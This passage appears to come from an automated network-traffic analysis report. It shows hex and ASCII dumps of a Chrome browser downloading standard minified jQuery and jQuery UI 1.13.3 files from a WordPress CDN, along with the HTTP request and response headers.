                                                                                                                                                                                                                                                        Data Ascii: length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:oe.sort,splice:oe.splice},ce.extend=ce.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.leng
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 6d 61 6b 65 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 74 7c 7c 5b 5d 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 65 26 26 28 63 28 4f 62 6a 65 63 74 28 65 29 29 3f 63 65 2e 6d 65 72 67 65 28 6e 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 5b 65 5d 3a 65 29 3a 73 2e 63 61 6c 6c 28 6e 2c 65 29 29 2c 6e 7d 2c 69 6e 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 2d 31 3a 73 65 2e 63 61 6c 6c 28 74 2c 65 2c 6e 29 7d 2c 69 73 58 4d 4c 44 6f 63 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 2e 64 6f 63 75 6d 65 6e
                                                                                                                                                                                                                                                        Data Ascii: makeArray:function(e,t){var n=t||[];return null!=e&&(c(Object(e))?ce.merge(n,"string"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:se.call(t,e,n)},isXMLDoc:function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument||e).documen
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 61 70 65 53 65 6c 65 63 74 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 28 65 2b 22 22 29 2e 72 65 70 6c 61 63 65 28 66 2c 70 29 7d 3b 76 61 72 20 79 65 3d 43 2c 6d 65 3d 73 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 62 2c 77 2c 6f 2c 61 2c 54 2c 72 2c 43 2c 64 2c 69 2c 6b 3d 6d 65 2c 53 3d 63 65 2e 65 78 70 61 6e 64 6f 2c 45 3d 30 2c 6e 3d 30 2c 73 3d 57 28 29 2c 63 3d 57 28 29 2c 75 3d 57 28 29 2c 68 3d 57 28 29 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 74 26 26 28 61 3d 21 30 29 2c 30 7d 2c 66 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61
                                                                                                                                                                                                                                                        Data Ascii: apeSelector=function(e){return(e+"").replace(f,p)};var ye=C,me=s;!function(){var e,b,w,o,a,T,r,C,d,i,k=me,S=ce.expando,E=0,n=0,s=W(),c=W(),u=W(),h=W(),l=function(e,t){return e===t&&(a=!0),0},f="checked|selected|async|autofocus|autoplay|controls|defer|disa
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 67 65 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 4d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 56 28 29 7d 2c 52 3d 4a 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 30 3d 3d 3d 65 2e 64 69 73 61 62 6c 65 64 26 26 66 65 28 65 2c
                                                                                                                                                                                                                                                        Data Ascii: xp("\\\\[\\da-fA-F]{1,6}"+ge+"?|\\\\([^\\r\\n\\f])","g"),P=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},M=function(){V()},R=J(function(e){return!0===e.disabled&&fe(e,
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 69 62 75 74 65 28 22 69 64 22 29 7d 7d 7d 72 65 74 75 72 6e 20 72 65 28 74 2e 72 65 70 6c 61 63 65 28 76 65 2c 22 24 31 22 29 2c 65 2c 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 57 28 29 7b 76 61 72 20 72 3d 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 72 2e 70 75 73 68 28 74 2b 22 20 22 29 3e 62 2e 63 61 63 68 65 4c 65 6e 67 74 68 26 26 64 65 6c 65 74 65 20 65 5b 72 2e 73 68 69 66 74 28 29 5d 2c 65 5b 74 2b 22 20 22 5d 3d 6e 7d 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 53 5d 3d 21 30 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 24 28 65 29 7b 76 61 72 20 74 3d 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 66 69 65 6c 64 73 65 74 22 29 3b 74 72 79 7b 72 65 74 75 72 6e 21 21 65
                                                                                                                                                                                                                                                        Data Ascii: ibute("id")}}}return re(t.replace(ve,"$1"),e,n,r)}function W(){var r=[];return function e(t,n){return r.push(t+" ")>b.cacheLength&&delete e[r.shift()],e[t+" "]=n}}function F(e){return e[S]=!0,e}function $(e){var t=T.createElement("fieldset");try{return!!e
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 74 65 64 4d 61 74 63 68 3d 24 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 69 2e 63 61 6c 6c 28 65 2c 22 2a 22 29 7d 29 2c 6c 65 2e 73 63 6f 70 65 3d 24 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 54 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 73 63 6f 70 65 22 29 7d 29 2c 6c 65 2e 63 73 73 48 61 73 3d 24 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 54 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 3a 68 61 73 28 2a 2c 3a 6a 71 66 61 6b 65 29 22 29 2c 21 31 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 30 7d 7d 29 2c 6c 65 2e 67 65 74 42 79 49 64 3f 28 62 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 72 65 70 6c 61 63 65 28 4f 2c 50 29
                                                                                                                                                                                                                                                        Data Ascii: tedMatch=$(function(e){return i.call(e,"*")}),le.scope=$(function(){return T.querySelectorAll(":scope")}),le.cssHas=$(function(){try{return T.querySelector(":has(*,:jqfake)"),!1}catch(e){return!0}}),le.getById?(b.filter.ID=function(e){var t=e.replace(O,P)
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 28 22 5b 69 64 7e 3d 22 2b 53 2b 22 2d 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 64 2e 70 75 73 68 28 22 7e 3d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 64 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 64 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 28 74 3d 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29
                                                                                                                                                                                                                                                        Data Ascii: ("[id~="+S+"-]").length||d.push("~="),e.querySelectorAll("a#"+S+"+*").length||d.push(".#.+[+~]"),e.querySelectorAll(":checked").length||d.push(":checked"),(t=T.createElement("input")).setAttribute("type","hidden"),e.appendChild(t).setAttribute("name","D")
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 29 3b 76 61 72 20 6e 3d 62 2e 61 74 74 72 48 61 6e 64 6c 65 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 2c 72 3d 6e 26 26 75 65 2e 63 61 6c 6c 28 62 2e 61 74 74 72 48 61 6e 64 6c 65 2c 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3f 6e 28 65 2c 74 2c 21 43 29 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 72 3f 72 3a 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 74 29 7d 2c 49 2e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 53 79 6e 74 61 78 20 65 72 72 6f 72 2c 20 75 6e 72 65 63 6f 67 6e 69 7a 65 64 20 65 78 70 72 65 73 73 69 6f 6e 3a 20 22 2b 65 29 7d 2c 63 65 2e 75 6e 69 71 75 65 53 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3d 5b 5d
                                                                                                                                                                                                                                                        Data Ascii: );var n=b.attrHandle[t.toLowerCase()],r=n&&ue.call(b.attrHandle,t.toLowerCase())?n(e,t,!C):void 0;return void 0!==r?r:e.getAttribute(t)},I.error=function(e){throw new Error("Syntax error, unrecognized expression: "+e)},ce.uniqueSort=function(e){var t,n=[]


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        24192.168.2.449773192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC400OUTGET /wp-includes/js/jquery/ui/core.min.js?ver=1.13.3 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC627INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:10 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 21464
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-includes/js/jquery/ui/core.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Thu, 27 Jun 2024 12:55:22 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 1.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: HIT jfk 1
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC742INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 55 49 20 2d 20 76 31 2e 31 33 2e 33 20 2d 20 32 30 32 34 2d 30 34 2d 32 36 0a 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 2a 20 49 6e 63 6c 75 64 65 73 3a 20 77 69 64 67 65 74 2e 6a 73 2c 20 70 6f 73 69 74 69 6f 6e 2e 6a 73 2c 20 64 61 74 61 2e 6a 73 2c 20 64 69 73 61 62 6c 65 2d 73 65 6c 65 63 74 69 6f 6e 2e 6a 73 2c 20 65 66 66 65 63 74 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 62 6c 69 6e 64 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 62 6f 75 6e 63 65 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 63 6c 69 70 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 64 72 6f 70 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 65 78 70
                                                                                                                                                                                                                                                        Data Ascii: /*! jQuery UI - v1.13.3 - 2024-04-26* https://jqueryui.com* Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js, effects/effect-clip.js, effects/effect-drop.js, effects/effect-exp
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 74 72 6f 6c 67 72 6f 75 70 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 64 61 74 65 70 69 63 6b 65 72 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 64 69 61 6c 6f 67 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 64 72 61 67 67 61 62 6c 65 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 64 72 6f 70 70 61 62 6c 65 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 6d 65 6e 75 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 6d 6f 75 73 65 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 70 72 6f 67 72 65 73 73 62 61 72 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 72 65 73 69 7a 61 62 6c 65 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 73 65 6c 65 63 74 61 62 6c 65 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 73 65 6c 65 63 74 6d 65 6e 75 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 73 6c 69 64 65 72 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 73
                                                                                                                                                                                                                                                        Data Ascii: trolgroup.js, widgets/datepicker.js, widgets/dialog.js, widgets/draggable.js, widgets/droppable.js, widgets/menu.js, widgets/mouse.js, widgets/progressbar.js, widgets/resizable.js, widgets/selectable.js, widgets/selectmenu.js, widgets/slider.js, widgets/s
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3f 22 73 65 6c 65 63 74 73 74 61 72 74 22 3a 22 6d 6f 75 73 65 64 6f 77 6e 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 6e 28 74 2b 22 2e 75 69 2d 64 69 73 61 62 6c 65 53 65 6c 65 63 74 69 6f 6e 22 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 29 7d 29 2c 65 6e 61 62 6c 65 53 65 6c 65 63 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 66 66 28 22 2e 75 69 2d 64 69 73 61 62 6c 65 53 65 6c 65 63 74 69 6f 6e 22 29 7d 7d 29 2c 0a 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 49 20 46 6f 63 75 73 61 62 6c 65 20 31 2e 31 33 2e 33 0a 20 2a 20 68 74 74 70
                                                                                                                                                                                                                                                        Data Ascii: document.createElement("div")?"selectstart":"mousedown",function(){return this.on(t+".ui-disableSelection",function(t){t.preventDefault()})}),enableSelection:function(){return this.off(".ui-disableSelection")}}),/*! * jQuery UI Focusable 1.13.3 * http
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 6f 6e 28 29 7b 76 61 72 20 74 3d 65 2e 64 61 74 61 28 22 75 69 2d 66 6f 72 6d 2d 72 65 73 65 74 2d 69 6e 73 74 61 6e 63 65 73 22 29 3b 78 2e 65 61 63 68 28 74 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 72 65 66 72 65 73 68 28 29 7d 29 7d 29 7d 2c 5f 62 69 6e 64 46 6f 72 6d 52 65 73 65 74 48 61 6e 64 6c 65 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3b 74 68 69 73 2e 66 6f 72 6d 3d 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 5f 66 6f 72 6d 28 29 2c 74 68 69 73 2e 66 6f 72 6d 2e 6c 65 6e 67 74 68 26 26 28 28 74 3d 74 68 69 73 2e 66 6f 72 6d 2e 64 61 74 61 28 22 75 69 2d 66 6f 72 6d 2d 72 65 73 65 74 2d 69 6e 73 74 61 6e 63 65 73 22 29 7c 7c 5b 5d 29 2e 6c 65 6e 67 74 68 7c 7c 74 68 69 73 2e 66 6f 72 6d 2e 6f 6e 28 22 72 65 73 65 74 2e 75 69 2d
                                                                                                                                                                                                                                                        Data Ascii: on(){var t=e.data("ui-form-reset-instances");x.each(t,function(){this.refresh()})})},_bindFormResetHandler:function(){var t;this.form=this.element._form(),this.form.length&&((t=this.form.data("ui-form-reset-instances")||[]).length||this.form.on("reset.ui-
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 3d 31 7d 29 7d 7d 29 2c 0a 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 49 20 4b 65 79 63 6f 64 65 20 31 2e 31 33 2e 33 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 78 2e 75 69 2e 6b 65 79 43 6f 64 65 3d 7b 42 41 43 4b 53 50 41 43 45 3a 38 2c 43 4f 4d 4d 41 3a 31 38 38 2c 44 45 4c 45 54 45 3a 34 36 2c 44 4f 57 4e 3a 34 30 2c 45 4e 44 3a 33 35 2c 45 4e 54
                                                                                                                                                                                                                                                        Data Ascii: =1})}}),/*! * jQuery UI Keycode 1.13.3 * https://jqueryui.com * * Copyright OpenJS Foundation and other contributors * Released under the MIT license. * https://jquery.org/license */x.ui.keyCode={BACKSPACE:8,COMMA:188,DELETE:46,DOWN:40,END:35,ENT
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 61 70 69 2e 6a 71 75 65 72 79 75 69 2e 63 6f 6d 2f 70 6f 73 69 74 69 6f 6e 2f 0a 20 2a 2f 0a 57 3d 4d 61 74 68 2e 6d 61 78 2c 43 3d 4d 61 74 68 2e 61 62 73 2c 6f 3d 2f 6c 65 66 74 7c 63 65 6e 74 65 72 7c 72 69 67 68 74 2f 2c 73 3d 2f 74 6f 70 7c 63 65 6e 74 65 72 7c 62 6f 74 74 6f 6d 2f 2c 72 3d 2f 5b 5c 2b 5c 2d 5d 5c 64 2b 28 5c 2e 5b 5c 64 5d 2b 29 3f 25 3f 2f 2c 6c 3d 2f 5e 5c 77 2b 2f 2c 61 3d 2f 25 24 2f 2c 68 3d 78 2e 66 6e 2e 70 6f 73 69 74 69 6f 6e 2c 78 2e 70 6f 73 69 74 69 6f 6e 3d 7b 73 63 72 6f 6c 6c 62 61 72 57 69 64 74 68 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 2c 65 2c 69 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 3a
                                                                                                                                                                                                                                                        Data Ascii: query.org/license * * https://api.jqueryui.com/position/ */W=Math.max,C=Math.abs,o=/left|center|right/,s=/top|center|bottom/,r=/[\+\-]\d+(\.[\d]+)?%?/,l=/^\w+/,a=/%$/,h=x.fn.position,x.position={scrollbarWidth:function(){var t,e,i;return void 0!==n?n:
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 62 3d 28 66 2e 63 6f 6c 6c 69 73 69 6f 6e 7c 7c 22 66 6c 69 70 22 29 2e 73 70 6c 69 74 28 22 20 22 29 2c 5f 3d 7b 7d 2c 65 3d 39 3d 3d 3d 28 65 3d 28 74 3d 76 29 5b 30 5d 29 2e 6e 6f 64 65 54 79 70 65 3f 7b 77 69 64 74 68 3a 74 2e 77 69 64 74 68 28 29 2c 68 65 69 67 68 74 3a 74 2e 68 65 69 67 68 74 28 29 2c 6f 66 66 73 65 74 3a 7b 74 6f 70 3a 30 2c 6c 65 66 74 3a 30 7d 7d 3a 4e 28 65 29 3f 7b 77 69 64 74 68 3a 74 2e 77 69 64 74 68 28 29 2c 68 65 69 67 68 74 3a 74 2e 68 65 69 67 68 74 28 29 2c 6f 66 66 73 65 74 3a 7b 74 6f 70 3a 74 2e 73 63 72 6f 6c 6c 54 6f 70 28 29 2c 6c 65 66 74 3a 74 2e 73 63 72 6f 6c 6c 4c 65 66 74 28 29 7d 7d 3a 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 3f 7b 77 69 64 74 68 3a 30 2c 68 65 69 67 68 74 3a 30 2c 6f 66 66 73 65 74
                                                                                                                                                                                                                                                        Data Ascii: b=(f.collision||"flip").split(" "),_={},e=9===(e=(t=v)[0]).nodeType?{width:t.width(),height:t.height(),offset:{top:0,left:0}}:N(e)?{width:t.width(),height:t.height(),offset:{top:t.scrollTop(),left:t.scrollLeft()}}:e.preventDefault?{width:0,height:0,offset
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 74 3a 65 2c 6d 61 72 67 69 6e 54 6f 70 3a 6e 7d 2c 78 2e 65 61 63 68 28 5b 22 6c 65 66 74 22 2c 22 74 6f 70 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 78 2e 75 69 2e 70 6f 73 69 74 69 6f 6e 5b 62 5b 74 5d 5d 26 26 78 2e 75 69 2e 70 6f 73 69 74 69 6f 6e 5b 62 5b 74 5d 5d 5b 65 5d 28 68 2c 7b 74 61 72 67 65 74 57 69 64 74 68 3a 64 2c 74 61 72 67 65 74 48 65 69 67 68 74 3a 70 2c 65 6c 65 6d 57 69 64 74 68 3a 6c 2c 65 6c 65 6d 48 65 69 67 68 74 3a 61 2c 63 6f 6c 6c 69 73 69 6f 6e 50 6f 73 69 74 69 6f 6e 3a 69 2c 63 6f 6c 6c 69 73 69 6f 6e 57 69 64 74 68 3a 6f 2c 63 6f 6c 6c 69 73 69 6f 6e 48 65 69 67 68 74 3a 73 2c 6f 66 66 73 65 74 3a 5b 63 5b 30 5d 2b 75 5b 30 5d 2c 63 5b 31 5d 2b 75 5b 31 5d 5d 2c 6d 79 3a 66 2e 6d 79 2c 61 74 3a 66 2e 61 74 2c 77
                                                                                                                                                                                                                                                        Data Ascii: t:e,marginTop:n},x.each(["left","top"],function(t,e){x.ui.position[b[t]]&&x.ui.position[b[t]][e](h,{targetWidth:d,targetHeight:p,elemWidth:l,elemHeight:a,collisionPosition:i,collisionWidth:o,collisionHeight:s,offset:[c[0]+u[0],c[1]+u[1]],my:f.my,at:f.at,w
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 74 6f 70 2b 3d 72 2d 69 29 3a 74 2e 74 6f 70 3d 21 28 30 3c 6c 26 26 72 3c 3d 30 29 26 26 6c 3c 72 3f 6e 2b 6f 2d 65 2e 63 6f 6c 6c 69 73 69 6f 6e 48 65 69 67 68 74 3a 6e 3a 30 3c 72 3f 74 2e 74 6f 70 2b 3d 72 3a 30 3c 6c 3f 74 2e 74 6f 70 2d 3d 6c 3a 74 2e 74 6f 70 3d 57 28 74 2e 74 6f 70 2d 73 2c 74 2e 74 6f 70 29 7d 7d 2c 66 6c 69 70 3a 7b 6c 65 66 74 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 69 3d 65 2e 77 69 74 68 69 6e 2c 6e 3d 69 2e 6f 66 66 73 65 74 2e 6c 65 66 74 2b 69 2e 73 63 72 6f 6c 6c 4c 65 66 74 2c 6f 3d 69 2e 77 69 64 74 68 2c 69 3d 69 2e 69 73 57 69 6e 64 6f 77 3f 69 2e 73 63 72 6f 6c 6c 4c 65 66 74 3a 69 2e 6f 66 66 73 65 74 2e 6c 65 66 74 2c 73 3d 74 2e 6c 65 66 74 2d 65 2e 63 6f 6c 6c 69 73 69 6f 6e 50 6f 73 69 74 69 6f
                                                                                                                                                                                                                                                        Data Ascii: top+=r-i):t.top=!(0<l&&r<=0)&&l<r?n+o-e.collisionHeight:n:0<r?t.top+=r:0<l?t.top-=l:t.top=W(t.top-s,t.top)}},flip:{left:function(t,e){var i=e.within,n=i.offset.left+i.scrollLeft,o=i.width,i=i.isWindow?i.scrollLeft:i.offset.left,s=t.left-e.collisionPositio
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 6c 65 6d 65 6e 74 7d 63 61 74 63 68 28 74 29 7b 69 3d 65 2e 62 6f 64 79 7d 72 65 74 75 72 6e 20 69 3d 28 69 3d 69 7c 7c 65 2e 62 6f 64 79 29 2e 6e 6f 64 65 4e 61 6d 65 3f 69 3a 65 2e 62 6f 64 79 7d 2c 78 2e 75 69 2e 73 61 66 65 42 6c 75 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 26 26 22 62 6f 64 79 22 21 3d 3d 74 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 26 26 78 28 74 29 2e 74 72 69 67 67 65 72 28 22 62 6c 75 72 22 29 7d 2c 0a 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 49 20 53 63 72 6f 6c 6c 20 50 61 72 65 6e 74 20 31 2e 31 33 2e 33 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f
                                                                                                                                                                                                                                                        Data Ascii: lement}catch(t){i=e.body}return i=(i=i||e.body).nodeName?i:e.body},x.ui.safeBlur=function(t){t&&"body"!==t.nodeName.toLowerCase()&&x(t).trigger("blur")},/*! * jQuery UI Scroll Parent 1.13.3 * https://jqueryui.com * * Copyright OpenJS Foundation and o


